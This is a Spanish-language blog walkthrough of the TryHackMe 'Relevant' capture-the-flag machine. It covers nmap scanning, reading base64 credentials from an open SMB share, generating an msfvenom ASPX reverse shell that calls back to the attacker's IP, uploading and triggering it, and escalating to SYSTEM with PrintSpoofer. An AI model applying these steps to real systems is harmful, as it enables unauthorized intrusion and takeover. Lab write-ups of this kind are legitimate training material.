---
title: "[ TRYHACKME ] RELEVANT"
date: 2021-03-28T13:17:53+02:00
draft: false
toc: false
---

Lo primero que tenemos que utilizar es la herramienta 'nmap' para escanear los puertos existentes y saber cuales están abiertos.

Si quieres saber más sobre nmap puedes ir directo a esta room: https://tryhackme.com/room/furthernmap

`nmap -sV -T4 -sS -p- 10.10.60.19`

![](https://i.imgur.com/r83DaUW.jpg)

Gracias al escaneo podemos observar que se trata de una máquina Windows y que podemos ver sus directorios gracias al servidor samba. Tenemos que tener en cuenta el puerto 49663. 

Listamos los directorios de la máquina con samba:

Si quieres saber más sobre samba puedes ir directo a esta room, el cual utiliza la herramienta mencionada para resolver la máquina: https://tryhackme.com/room/kenobi

`smbclient -L \\\10.10.60.19\\`

![](https://i.imgur.com/xH0GqoE.jpg)

Vemos que hay un directorio suelto llamado 'nt4wrksv', vamos a ver que contiene.

`smbclient \\\\10.10.60.19\\nt4wrksv`

![](https://i.imgur.com/Og4OwVG.jpg)

Listamos  (dir) que contiene el directorio y encontramos un archivo .txt llamado 'passwords.txt'. Lo pasamos a nuestra máquina con el comando get y lo abrimos (cat) para ver que contiene.

Podemos observar que hay dos líneas encriptadas con base64 (encima de las líneas nos pone que lo encriptado tiene una forma de 'user - password'), vamos a desencriptarlas:

Si quieres saber lo básico sobre crypto puedes hacer la tarea 1 de esta room: 
https://tryhackme.com/room/c4ptur3th3fl4g

![](https://i.imgur.com/GzxzYcg.jpg)

Si buscamos vulnerabilidades con nmap, obtenemos lo siguiente:

`nmap -script vuln -p 80,135,445,3389 10.10.60.19`

![](https://i.imgur.com/u305M8J.jpg)

Observamos que existe una vulnerabilidad de REMOTE CODE EXECUTION llamada 'CVE-2017-0143'. Está relacionada con el exploit EternalBlue.

Existe una room en THM el cual toca el exploit EternalBlue a través de metasploit: 
https://tryhackme.com/room/blue

Gracias a esto sabemos que en el directorio 'nt4wrksv' se pueden subir archivos sin ningun tipo de problema, por lo tanto vamos a crear con msfvenom una reverse shell con la que acceder a la máquina:

`msfvenom -l payloads | grep windows | grep reverse | grep shell`

![](https://i.imgur.com/srcwGrT.jpg)

`msfvenom -p windows/x64/shell_reverse_tcp LHOST=<mi IP> LPORT=4444 -f aspx -o rev.aspx`

![](https://i.imgur.com/x708mrw.jpg)

Ahora que ya la tenemos vamos a subirla al servidor samba a través del comando put:

![](https://i.imgur.com/eToWjTR.jpg)


Ahora vamos a dejar el puerto 4444 en escucha:

`nc -lvnp 4444`

Despues de estos pasos vamos a ir a la dirección:

http://10.10.20.95:49663/nt4wrksv/rev.aspx

**Tuve que restablecer la máquina porque no me daba conectado al servidor samba con la otra IP, por lo tanto cambió la IP el cual ahora será '10.10.20.95'**

Y ya tendremos nuestra reverse shell creada:

![](https://i.imgur.com/IAz6NJa.jpg)

Avanzamos a través de los directorios (cd) hasta encontrar la bandera de user.txt, el cual abrimos con el comando 'more':

![](https://i.imgur.com/cuAk5QF.jpg)

Para encontrar la segunda bandera (root.txt) vamos a necesitar hacer una escalada de privilegios a través de la herramienta PrintSpoofer (esto lo sabemos porque si lanzamos el comando whoami /priv, el usuario tiene el token 'SeImpersonatePrivilege' habilitado) la cual se puede clonar desde este enlace:

 https://github.com/dievus/printspoofer
 
 Y para clonar el repositorio en nuestra máquina:
 
 `git clone https://github.com/dievus/printspoofer`
 
 Una vez la tengamos clonada, vamos a subir al servidor samba el archivo PrintSpoofer.exe:
 
 `put PrintSpoofer.exe`
 
 Despues de esto nos vamos al directorio nt4wrksv, el cual esta situado en 'C:\inetpub\wwwroot\nt4wrksv' en la reverse shell donde podemos encontrar el archivo .exe listo para ser ejecutado a través del comando:
 
`PrintSpoofer.exe -i -c cmd`

Para crear una shell.
 
![](https://i.imgur.com/loRSM58.jpg)

Listo, ya hemos escalado privilegios, ahora si lanzamos un 'whoami' vamos a poder ver que somos el usuario nt authority\system (root).

Ahora solos nos queda ir a por la bandera root.txt:

![](https://i.imgur.com/xxlPj4m.jpg)

Espero que os haya gustado la máquina y el write-up!
 
 
 
 























